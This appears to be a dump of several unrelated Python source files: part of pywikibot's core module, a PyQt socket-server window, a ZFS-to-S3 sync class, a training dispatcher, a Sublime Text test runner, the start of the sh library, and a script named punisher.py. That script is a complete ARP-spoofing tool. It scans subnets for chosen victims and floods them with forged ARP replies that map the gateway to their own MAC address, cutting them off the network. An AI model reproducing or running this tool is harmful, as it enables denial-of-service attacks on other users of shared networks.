:param site: The Wikibase site
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a tabular-data repository.
:param site: The Wikibase site
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbTabularData.
:param site: The Wikibase site
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
This will prevent the bot from breaking completely when a new type
is introduced.
This data type is just a json container
*New in version 3.0.*
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
:param json: Wikibase JSON
"""
self.json = json
def toWikibase(self) -> dict:
"""
Return the JSON object for the Wikibase API.
:return: Wikibase JSON
"""
return self.json
@classmethod
def fromWikibase(cls, json: dict):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
:param json: Wikibase JSON
:rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
@cache
def _code_fam_from_url(url: str, name: Optional[str] = None):
"""Set url to cache and get code and family from cache.
Site helper method.
:param url: The site URL to get code and family
:param name: A family name used by AutoFamily
"""
matched_sites = []
# Iterate through all families and look, which does apply to
# the given URL
for fam in _config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
if not name: # create a name from url
name = urlparse(url).netloc.split('.')[-2]
name = removesuffix(name, 'wiki')
family = AutoFamily(name, url)
matched_sites.append((family.code, family))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{}": {} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
return matched_sites[0]
@_deprecate_arg('sysop', True)
def Site(code: Optional[str] = None, fam=None, user: Optional[str] = None, *,
interface=None,
url: Optional[str] = None) -> Union[APISite, DataSite, ClosedSite]:
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
Creating the default site using config.mylang and config.family::
site = pywikibot.Site()
Override default site code::
site = pywikibot.Site('fr')
Override default family::
site = pywikibot.Site(family='wikisource')
Setting a specific site::
site = pywikibot.Site('fr', 'wikisource')
which is equal to::
site = pywikibot.Site('wikisource:fr')
:Note: An already created site is cached an a new variable points to
the same object if interface, family, code and user are equal:
>>> import pywikibot
>>> site_1 = pywikibot.Site('wikisource:fr')
>>> site_2 = pywikibot.Site('fr', 'wikisource')
>>> site_1 is site_2
True
>>> site_1
APISite("fr", "wikisource")
``APISite`` is the default interface. Refer :py:obj:`pywikibot.site` for
other interface types.
**Never create a site object via interface class directly.**
Always use this factory method.
:param code: language code (override config.mylang)
code may also be a sitename like 'wikipedia:test'
:param fam: family name or object (override config.family)
:type fam: str or pywikibot.family.Family
:param user: bot user name to use on this site (override config.usernames)
:param interface: site class or name of class in :py:obj:`pywikibot.site`
(override config.site_interface)
:type interface: subclass of :py:obj:`pywikibot.site.BaseSite` or string
:param url: Instead of code and fam, does try to get a Site based on the
URL. Still requires that the family supporting that URL exists.
:raises ValueError: URL and pair of code and family given
:raises ValueError: Invalid interface name
"""
_logger = 'wiki'
if url:
# Either code and fam or url with optional fam for AutoFamily name
if code:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url, fam)
elif code and ':' in code:
if fam:
raise ValueError(
'sitename OR a pair of code and family name '
'should be provided')
fam, _, code = code.partition(':')
else:
# Fallback to config defaults
code = code or _config.mylang
fam = fam or _config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = {}
if '*' in _config.usernames: # T253127: usernames is a defaultdict
code_to_user = _config.usernames['*'].copy()
code_to_user.update(_config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
if not isinstance(interface, type):
# If it isn't a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface={}'.format(interface.__name__))
user = normalize_username(user)
key = '{}:{}:{}:{}'.format(interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user)
debug("Instantiated {} object '{}'"
.format(interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site {} instantiated using different code "{}"'
.format(_sites[key], code), UserWarning, 2)
return _sites[key]
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Category,
Claim,
FilePage,
ItemPage,
Link,
Page,
PropertyPage,
SiteLink,
User,
html2unicode,
url2unicode,
)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=round(remainingPages * _config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > _config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
if _putthread is not threading.current_thread():
while (_putthread.is_alive()
and (page_put_queue.qsize() > 0
or page_put_queue_busy.qsize() > 0)):
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {} pages remaining in the queue. '
'Estimated time remaining: {}\nReally exit?'
.format(*remaining()),
default=False, automatic_quit=False):
# delete the put queue
with page_put_queue.mutex:
page_put_queue.all_tasks_done.notify_all()
page_put_queue.queue.clear()
page_put_queue.not_full.notify_all()
break
# only need one drop() call because all throttles use the same global pid
with suppress(IndexError):
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
page_put_queue_busy.put(None)
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
page_put_queue_busy.get()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.is_alive():
with page_put_queue.mutex, suppress(AssertionError, RuntimeError):
_putthread.start()
page_put_queue.put((request, args, kwargs))
# queue to hold pending requests
page_put_queue = Queue(_config.max_queue_size)
# queue to signal that async_manager is working on a request. See T147178.
page_put_queue_busy = Queue(_config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper.add_deprecated_attr('config2', replacement_name='pywikibot.config',
since='20210426')
wrapper.add_deprecated_attr('__release__', __version__,
replacement_name='pywikibot.__version__',
since='20200707')
wrapper.add_deprecated_attr('showHelp', show_help,
since='20200705')
wrapper.add_deprecated_attr(
'unicode2html', replacement_name='pywikibot.tools.chars.string2html',
since='6.2.0')
# This module aliases many (but not all) pywikibot.exception classes and one
# from pywikibot.data.api. Use of these aliases is deprecated. When removed
# we can drop them from both our import and __all__ listing.
EXCEPTION_CLASSES = {
n for n, _ in inspect.getmembers(exceptions, inspect.isclass)
}
EXCEPTION_CLASSES.add('UploadWarning')
EXCEPTION_CLASSES.update(DEPRECATED_EXCEPTIONS.keys())
for name in __all__:
if name in EXCEPTION_CLASSES:
if name in DEPRECATED_EXCEPTIONS:
replacement = DEPRECATED_EXCEPTIONS[name]
elif name == 'UploadWarning':
replacement = 'UploadError'
else:
replacement = name
wrapper.add_deprecated_attr(
name,
replacement_name='pywikibot.exceptions.{}'.format(replacement),
since='20210424'
)
|
socket_server_window.py
|
"""
@Time : 2020/1/21 15:13
@Author : weijiang
@Site :
@File : socket_server_window.py
@Software: PyCharm
"""
import sys
from threading import Thread
from view.socker_server_window import Ui_Form
from PyQt5.QtWidgets import QWidget, QApplication
from util.common_util import read_qss, SUPER_DIR, hint_dialog, APP_ICON
from util.style import CAL_PUSHBUTTON_STYLE, VERTICAL_SCROLL_BAR_STYLE
from util.socket_model import TCPSocketServer
class SocketServerWindow(Ui_Form, QWidget):
def __init__(self):
super(SocketServerWindow, self).__init__()
self.setupUi(self)
self.init_ui()
self.init_slot()
def init_ui(self):
self.tcp_checkBox.setChecked(True)
self.tcp_checkBox.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/checkbox_qss.qss'))
self.udp_checkBox.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/checkbox_qss.qss'))
self.start_server_pushButton.setStyleSheet(CAL_PUSHBUTTON_STYLE)
self.open_folder_pushButton.setStyleSheet(CAL_PUSHBUTTON_STYLE)
self.host_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.port_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.save_path_lineEdit.setStyleSheet(read_qss(SUPER_DIR+r'/res/qss/lineedit_qss.qss'))
self.textBrowser.verticalScrollBar().setStyleSheet(VERTICAL_SCROLL_BAR_STYLE)
def init_slot(self):
self.start_server_pushButton.clicked.connect(self.start_server)
def start_server(self):
if self.tcp_checkBox.isChecked():
try:
host = self.host_lineEdit.text()
port = self.port_lineEdit.text()
if '' in [port, host]:
hint_dialog(self, APP_ICON, '提示', '请输入服务关键信息!')
return
sock = TCPSocketServer(host=host, port=int(port))
sock.send_info_signal.connect(self.display_socket_info)
th = Thread(target=sock.star_server)
th.setDaemon(True)
th.start()
self.textBrowser.append('<span style="color: green">>>>bind host {} and port {}</span>'.format(host,
port))
self.textBrowser.append('<span style="color: green">>>>listening...</span>')
except Exception as e:
print(e.args)
import traceback
traceback.print_exc()
else:
pass
pass
def display_socket_info(self, msg):
self.textBrowser.append(msg)
if __name__ == '__main__':
app = QApplication(sys.argv)
win = SocketServerWindow()
win.show()
sys.exit(app.exec_())
|
s3.py
|
import os
import sys
from cStringIO import StringIO
from collections import namedtuple
from zsync import Sync, Pipeable, Receivable
from zsync.uploader import Uploader
from zsync.downloader import Downloader
from zsync.snapshot import Snapshot
from multiprocessing import Process, Pipe
class S3(Sync):
"""
Sends and receives ZFS snapshots from S3
"""
def __init__(self, data, log):
super(S3, self).__init__(data, log)
def downloader(self, bucket, key, fp):
"""
Downloads to a stream
"""
fp = os.fdopen(fp, 'w')
AWS_ACCESS_KEY = self.args.access_key or os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = self.args.secret_key or os.environ['AWS_SECRET_KEY']
CHUNK_SIZE = self.args.size
CONCURRENCY = self.args.c
Downloader(AWS_ACCESS_KEY, AWS_SECRET_KEY, CHUNK_SIZE, CONCURRENCY).download(fp, bucket, key)
def _send_full_snahpshot(self, dataset, destination, first_snapshot):
"""
Retrives a snapshot and passes it a pipe from which the zfs receive reads
"""
key = "/".join(self.data.path)
key = key[1:]
key += "/" + self.data.dataset + "@" + first_snapshot
self.log.info("Running send from bucket=%s, key=%s", self.data.bucket, key)
if self.args.dryrun:
sys.stdout.write("s3cmd get s3://%s/%s - " % (self.data.bucket, key))
else:
pipeout, pipein = os.pipe()
downloader_process = Process(target=self.downloader, args=(self.data.bucket, key, pipein))
pipeout = os.fdopen(pipeout)
downloader_process.start()
FakePopen = namedtuple('FakePopen', ['stdout'])
data = FakePopen(stdout=pipeout)
destination.receive(data, dataset, first_snapshot)
downloader_process.join()
def _send_incremental_snapshot(self, dataset, destination, first_snapshot,
second_snapshot):
"""
There are no incremental snapshots from S3 so it fails back to the
full snapshot.
"""
self._send_full_snahpshot(dataset, destination, second_snapshot)
def _send_full_volume(self, until_snapshot, destination):
"""
Sends a full volume snapshot from S3 to a different destination.
Captures all snapshots that need to be sent then it removes all of them
but not the last one - mimics the effect of a proper zfs send
"""
local_snapshot_manager = Snapshot.from_context(self)
destination_strategy = Snapshot.from_context(destination)
destination_dataset = destination.data.dataset
# get latest snapshot from the destination
latest_snapshot = destination_strategy.get_latest_snapshot(destination_dataset)
# get local snapshots between, destination latest snapshot and the given snapshot
all_snapshots = local_snapshot_manager.get_snapshots_between(self.data.dataset, latest_snapshot, until_snapshot)
self._send_incremental_volume(until_snapshot, destination)
if len(all_snapshots) > 1:
all_snapshots = all_snapshots[:-1]
for snapshot in all_snapshots:
destination.destroy(snapshot)
def receive(self, source, dataset, snapshot_name):
"""
Puts a snapshot in S3 using Uploader
"""
key = "/".join(self.data.path)
key = key[1:]
key += "/" + self.data.dataset + "@" + snapshot_name
if self.args.dryrun:
sys.stdout.write(" | s3cmd put - s3://%s/%s\n" % (self.data.bucket, key))
else:
self.log.info("Receiving to s3 to bucket=%s, key=%s", self.data.bucket, key)
AWS_ACCESS_KEY = self.args.access_key or os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = self.args.secret_key or os.environ['AWS_SECRET_KEY']
CHUNK_SIZE = self.args.size
CONCURRENCY = self.args.c
Uploader(
AWS_ACCESS_KEY,
AWS_SECRET_KEY,
CHUNK_SIZE,
CONCURRENCY,
).upload(source.stdout, self.data.bucket, key, self.args.storage_class)
|
dispatch.py
|
#!/usr/bin/env python3
"""
This runs multiple copies of train.py in parallel, for each worker
"""
import sys
from contextlib import contextmanager
import multiprocessing
config = dict(
seed=42,
task="ImageNet",
model_name="ResNet_EvoNorm18",
data_split_method="dirichlet",
non_iid_alpha=1.0,
num_epochs=200,
batch_size=32, # per worker
algorithm="gossip",
overlap_communication=True,
topology="ring",
base_optimizer="SGD",
learning_rate=0.16,
num_lr_warmup_epochs=5,
lr_schedule_milestones=[(150, 0.1), (180, 0.1)],
momentum=0.0,
weight_decay=0.0001,
test_interval=4,
log_verbosity=1,
distributed_backend="gloo",
distributed_rank=0,
distributed_world_size=4, # 1 = turn off
distributed_init_file=None,
gpus_per_node=1,
)
def worker(rank):
import train
# Override config from train.py
for key in list(train.config.keys()):
del train.config[key]
for key, value in config.items():
train.config[key] = value
train.config["distributed_rank"] = rank
train.output_dir = output_dir
train.log_metric = log_metric
train.log_info = log_info
train.log_runtime = log_runtime
with print_prefix(f"Worker {rank}"):
train.main()
def main():
num_workers = config["distributed_world_size"]
processes = [
multiprocessing.Process(target=worker, args=(i,)) for i in range(num_workers)
]
for p in processes:
p.start()
for p in processes:
p.join()
output_dir = "output.tmp"
def log_info(info_dict):
"""Add any information to MongoDB
This function will be overwritten when called through run.py"""
pass
def log_metric(name, values, tags={}):
"""Log timeseries data
This function will be overwritten when called through run.py"""
value_list = []
for key in sorted(values.keys()):
value = values[key]
value_list.append(f"{key}:{value:7.3f}")
values = ", ".join(value_list)
tag_list = []
for key, tag in tags.items():
tag_list.append(f"{key}:{tag}")
tags = ", ".join(tag_list)
print("{name:30s} - {values} ({tags})".format(name=name, values=values, tags=tags))
@contextmanager
def print_prefix(prefix):
global is_new_line
orig_write = sys.stdout.write
is_new_line = True
def new_write(*args, **kwargs):
global is_new_line
if args[0] == "\n":
is_new_line = True
elif is_new_line:
orig_write("[" + str(prefix) + "]: ")
is_new_line = False
orig_write(*args, **kwargs)
sys.stdout.write = new_write
yield
sys.stdout.write = orig_write
def log_runtime(label, mean_time, std, instances):
"""This function will be overwritten when called through run.py"""
pass
if __name__ == "__main__":
main()
|
punisher.py
|
import scapy.all as scapy
import argparse
import multiprocessing
import threading
import time
CLIENTS = {}
SENT_PACKETS = 0
SEMAPHORE = 1
DOWN = threading.Event()
def scan_mac(mac, net):
mac = to_dict(mac)
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=net)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = {x[1].psrc: {'ip': x[1].psrc, 'mac': x[1].hwsrc,} for x in ans if x[1].hwsrc in mac}
return clients
def scan_mac_get_ip(mac, net):
mac = to_dict(mac)
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=net)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = [x[1].psrc for x in ans if x[1].hwsrc in mac]
return clients
def scan(ip):
arp_request = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') / scapy.ARP(op='who-has', pdst=ip)
ans, unans = scapy.srp(arp_request, timeout=3, verbose=False)
clients = {x[1].psrc: {'ip': x[1].psrc, 'mac': x[1].hwsrc,} for x in ans}
return clients
def get_own_ips():
return [x[4] for x in scapy.conf.route.routes if x[2] != '0.0.0.0']
def get_mac(ip):
return list(scan(ip).values())[0]['mac']
def update_clients(args):
try:
global CLIENTS, SEMAPHORE
while True:
while SEMAPHORE == 0 and DOWN.is_set() == False:
time.sleep(1)
if DOWN.is_set():
break
SEMAPHORE -= 1
clients = {}
for target in args.target:
clients.update(scan(target))
for net in args.subnet:
clients.update(scan_mac(args.target_mac, net))
exclude_ips = get_own_ips()
exclude_ips = exclude_ips + args.gateway + args.exclude
for net in args.subnet:
scanned_mac = scan_mac_get_ip(args.exclude_mac, net)
exclude_ips = exclude_ips + scanned_mac
for ip in exclude_ips:
if ip in clients:
del clients[ip]
CLIENTS = clients
SEMAPHORE += 1
DOWN.wait(5 * args.interval)
except Exception as e:
print(e)
DOWN.set()
def sucker_punch(args):
try:
global SEMAPHORE, SENT_PACKETS
while True:
while SEMAPHORE == 0 and DOWN.is_set() == False:
time.sleep(1)
if DOWN.is_set():
break
SEMAPHORE -= 1
for client in CLIENTS:
if DOWN.is_set():
SEMAPHORE += 1
break
for i in range(len(args.gateway)):
packet = scapy.ARP(op='is-at', psrc=args.gateway[i], hwsrc=CLIENTS[client]['mac'], pdst=CLIENTS[client]['ip'], hwdst=CLIENTS[client]['mac'])
scapy.send(packet, verbose=False)
SENT_PACKETS += 1
print('\r[+] Packets sent: {}'.format(SENT_PACKETS), end='')
SEMAPHORE += 1
DOWN.wait(args.interval)
except Exception as e:
print(e)
DOWN.set()
def run_away(args):
gateway_macs = [get_mac(gateway) for gateway in args.gateway]
for client in CLIENTS:
[
scapy.send(
scapy.ARP(op='is-at', psrc=args.gateway[i], hwsrc=gateway_macs[i], pdst=CLIENTS[client]['ip'], hwdst=CLIENTS[client]['mac']),
verbose=False, count=5, inter=0.2
)
for i in range(len(gateway_macs))
]
def disarm():
while True:
if DOWN.is_set():
break
if input() == 'quit':
DOWN.set()
break
def read_file(file):
ret = []
try:
with open(file, 'r') as f:
ret = [line.rstrip('\n') for line in f]
except:
pass
return ret
def to_dict(lst):
res = {lst[i]: True for i in range(len(lst))}
return res
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--subnet', default=None, help='path to file contains subnets')
parser.add_argument('-g', '--gateway', default=None, help='path to file contains gateway IP')
parser.add_argument('-t', '--target', default=None, help='path to file contains target IP')
parser.add_argument('-e', '--exclude', default=None, help='path to file contains IP to be excluded')
parser.add_argument('-tm', '--target-mac', default=None, help='path to file contains target MAC')
parser.add_argument('-em', '--exclude-mac', default=None, help='path to file contains MAC to be excluded')
parser.add_argument('-i', '--interval', default=10, type=float, help='time interval to send ARP packets')
args = parser.parse_args()
assert(args.gateway is not None and (args.target is not None or args.target_mac is not None))
try:
t_start = time.time()
args.subnet = read_file(args.subnet)
args.gateway = read_file(args.gateway)
args.target = read_file(args.target)
args.exclude = read_file(args.exclude)
args.target_mac = read_file(args.target_mac)
args.exclude_mac = read_file(args.exclude_mac)
t0 = threading.Thread(target=disarm, args=())
t1 = threading.Thread(target=update_clients, args=(args,))
t2 = threading.Thread(target=sucker_punch, args=(args,))
t0.start()
t1.start()
t2.start()
except Exception as e:
print(e)
finally:
t0.join()
t1.join()
t2.join()
run_away(args)
t_finish = time.time()
print('Time elapsed: {}'.format(t_finish - t_start))
|
__init__.py
|
import time
import threading
import unittest
import re
import sublime
LAST_COMMIT_TIMESTAMP = '2014-11-28 20:54:15'
LAST_COMMIT_VERSION = re.sub(r'[ :\-]', '.', LAST_COMMIT_TIMESTAMP)
CLIENT_ID = ''
CLIENT_SECRET = ''
class StringQueue():
def __init__(self):
self.lock = threading.Lock()
self.queue = ''
def write(self, data):
self.lock.acquire()
self.queue += data
self.lock.release()
def get(self):
self.lock.acquire()
output = self.queue
self.queue = ''
self.lock.release()
return output
def flush(self):
pass
def runner(window, test_classes):
"""
Runs tests in a thread and outputs the results to an output panel
:param window:
A sublime.Window object to use to display the results
:param test_classes:
A unittest.TestCase class, or list of classes
"""
output = StringQueue()
panel = window.get_output_panel('package_control_tests')
panel.settings().set('word_wrap', True)
window.run_command('show_panel', {'panel': 'output.package_control_tests'})
threading.Thread(target=show_results, args=(panel, output)).start()
threading.Thread(target=do_run, args=(test_classes, output)).start()
def do_run(test_classes, output):
if not isinstance(test_classes, list) and not isinstance(test_classes, tuple):
test_classes = [test_classes]
suite = unittest.TestSuite()
loader = unittest.TestLoader()
for test_class in test_classes:
suite.addTest(loader.loadTestsFromTestCase(test_class))
unittest.TextTestRunner(stream=output, verbosity=1).run(suite)
output.write("\x04")
def show_results(panel, output):
def write_to_panel(chars):
sublime.set_timeout(lambda: panel.run_command('package_control_insert', {'string': chars}), 10)
write_to_panel(u'Running Package Control Tests\n\n')
while True:
chars = output.get()
if chars == '':
time.sleep(0.1)
continue
if chars[-1] == "\x04":
chars = chars[0:-1]
write_to_panel(chars)
break
write_to_panel(chars)
|
sh.py
|
#===============================================================================
# Copyright (C) 2011-2012 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#===============================================================================
__version__ = "1.03"
__project_url__ = "https://github.com/amoffat/sh"
import platform
if "windows" in platform.system().lower():
raise ImportError("sh 1.0 is currently only supported on linux and osx. \
please install pbs 0.109 (http://pypi.python.org/pypi/pbs) for windows support.")
import sys
IS_PY3 = sys.version_info[0] == 3
import traceback
import os
import re
from glob import glob as original_glob
from types import ModuleType
from functools import partial
import inspect
import time as _time
if IS_PY3:
from io import StringIO
from io import BytesIO as cStringIO
from queue import Queue, Empty
else:
from StringIO import StringIO
from cStringIO import OutputType as cStringIO
from Queue import Queue, Empty
IS_OSX = platform.system() == "Darwin"
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
import errno
import warnings
import pty
import termios
import signal
import select
import atexit
import threading
import tty
import fcntl
import struct
import resource
from collections import deque
import logging
# this is ugly, but we've added a module-level logging kill switch. the reason
# for it (vs letting the user disable/enable logging through the logging
# module's facilities) is because to enable/disable logging using logging
# facilities, modules need to have their loggers (retrieved with
# logging.getLogger()) named using dot notation. so for example:
#
# log = logging.getLogger("sh.process")
#
# we don't do that though, because we cram a lot of info into the logger name
# for example, a logger name may be
# "<Process 1373 ['/usr/bin/python3.2', '/tmp/tmp2c18zp']>"
# because of this, a user can't disable our loggers (because we lack dot
# notation), and I won't add dot notation because I can't include all the
# data i need in my logger name. so this is really a shortcoming of the
# logging module.
logging_enabled = False
if IS_PY3:
raw_input = input
unicode = str
basestring = str
class ErrorReturnCode(Exception):
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
if self.stdout is None: tstdout = "<redirected>"
else:
tstdout = self.stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(tstdout)
if out_delta:
tstdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
if self.stderr is None: tstderr = "<redirected>"
else:
tstderr = self.stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(tstderr)
if err_delta:
tstderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg = "\n\n RAN: %r\n\n STDOUT:\n%s\n\n STDERR:\n%s" %\
(full_cmd, tstdout.decode(), tstderr.decode())
super(ErrorReturnCode, self).__init__(msg)
class CommandNotFound(Exception): pass
rc_exc_regex = re.compile("ErrorReturnCode_(\d+)")
rc_exc_cache = {}
def get_rc_exc(rc):
rc = int(rc)
try: return rc_exc_cache[rc]
except KeyError: pass
name = "ErrorReturnCode_%d" % rc
exc = type(name, (ErrorReturnCode,), {})
rc_exc_cache[rc] = exc
return exc
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program): return program
else:
if "PATH" not in os.environ: return None
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def resolve_program(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program: path = which(program.replace("_", "-"))
if not path: return None
return path
# we add this thin wrapper to glob.glob because of a specific edge case where
# glob does not expand to anything. for example, if you try to do
# glob.glob("*.py") and there are no *.py files in the directory, glob.glob
# returns an empty list. this empty list gets passed to the command, and
# then the command fails with a misleading error message. this thin wrapper
# ensures that if there is no expansion, we pass in the original argument,
# so that when the command fails, the error message is clearer
def glob(arg):
return original_glob(arg) or arg
class RunningCommand(object):
def __init__(self, cmd, call_args, stdin, stdout, stderr):
self.log = logging.getLogger("command %r call_args %r" % (cmd, call_args))
self.call_args = call_args
self.cmd = cmd
self.ran = " ".join(cmd)
self.process = None
self.should_wait = True
spawn_process = True
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
Command._prepend_stack.append(self)
if callable(call_args["out"]) or callable(call_args["err"]):
self.should_wait = False
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
self.should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]: self.should_wait = False
# redirection
if call_args["err_to_out"]: stderr = STDOUT
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True: pipe = STDOUT
elif call_args["iter"] == "err": pipe = STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True: pipe = STDOUT
elif call_args["iter_noblock"] == "err": pipe = STDERR
if spawn_process:
if logging_enabled: self.log.debug("starting process")
self.process = OProc(cmd, stdin, stdout, stderr,
self.call_args, pipe=pipe)
if self.should_wait:
self.wait()
def wait(self):
self._handle_exit_code(self.process.wait())
return self
# here we determine if we had an exception, or an error code that we weren't
# expecting to see. if we did, we create and raise an exception
def _handle_exit_code(self, code):
if code not in self.call_args["ok_code"] and code >= 0: raise get_rc_exc(code)(
" ".join(self.cmd),
self.process.stdout,
self.process.stderr
)
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
@property
def pid(self):
return self.process.pid
def __len__(self):
return len(str(self))
def __enter__(self):
# we don't actually do anything here because anything that should
# have been done would have been done in the Command.__call__ call.
# essentially all that has to happen is the comand be pushed on
# the prepend stack.
pass
def __iter__(self):
return self
def next(self):
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try: chunk = self.process._pipe_queue.get(False, .001)
except Empty:
if self.call_args["iter_noblock"]: return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
raise StopIteration()
try: return chunk.decode(self.call_args["encoding"])
except UnicodeDecodeError: return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and Command._prepend_stack:
Command._prepend_stack.pop()
def __str__(self):
if IS_PY3: return self.__unicode__()
else: return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
if self.process:
if self.stdout: return self.stdout.decode(self.call_args["encoding"])
return ""
def __eq__(self, other):
return unicode(self) == unicode(other)
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in ("signal", "terminate", "kill"):
if self.process: return getattr(self.process, p)
else: raise AttributeError
